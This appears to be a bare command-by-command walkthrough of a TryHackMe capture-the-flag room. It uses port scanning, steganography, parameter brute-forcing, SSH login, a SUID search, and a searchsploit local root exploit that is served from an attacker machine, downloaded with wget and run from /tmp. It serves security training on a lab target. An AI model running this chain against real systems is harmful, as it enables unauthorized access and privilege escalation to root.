1 - nmap -A 10.10.190.155
2 - wget http://10.10.190.155/thm.jpg
3 - bless -> thm.jpg -> PNG -> JPG
4 - http://10.10.190.155/th1s_1s_h1dd3n/?secret=1
5 - Burp Suite -> Intruder -> Payloads:Numbers
6 - steghide extract -sf thm.jpg
7 - cat hidden.txt -> ROT13
8 - wget TRYHACKME_MADNESS_BANNER_IMAGE_LINK
9 - steghide extract -sf image.jpg
10 - ssh joker@10.10.190.155
11 - cat user.txt
12 - find / -perm -u=s -type f 2>/dev/null
13 - searchsploit "4.5.0"
14 - searchsploit -m 41154
15 - python3 -m http.server 8000
16 - cd /tmp
17 - wget http://10.8.94.51:8000/41154.sh
18 - chmod +x 41154.sh
19 - sh 41154.sh
20 - whoami
21 - cat /root/root.txt
